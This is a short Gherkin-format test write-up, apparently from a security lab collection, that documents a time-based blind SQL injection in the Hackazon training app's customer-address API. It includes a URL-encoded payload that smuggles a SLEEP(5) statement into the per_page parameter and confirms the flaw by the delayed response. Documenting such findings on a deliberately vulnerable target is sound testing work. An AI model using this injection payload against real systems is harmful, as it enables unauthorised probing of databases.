# language: en

Feature: Time-based Blind SQL Injection
  From the Hackazon system
  From the category A1 - Injection
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/

  Background:
    Given I'm running Ubuntu 16.04 LTS
    And using Docker Docker version 18.06.1-ce, build e68fc7a
    And also using OWASP ZAP 2.7.0
    Given the following scenario
      """
      URN: /api/customerAddress?page=1&per_page=100
    """

  Scenario: Basic testing
    Given I am autenticated
    When i paste into the query string "per_page" the following
      """
      per_page=100%3B+SELECT+SLEEP%285%29%3B+%23
      """
    Then it takes 5s to be responded
    Then the vulnerability is confirmed
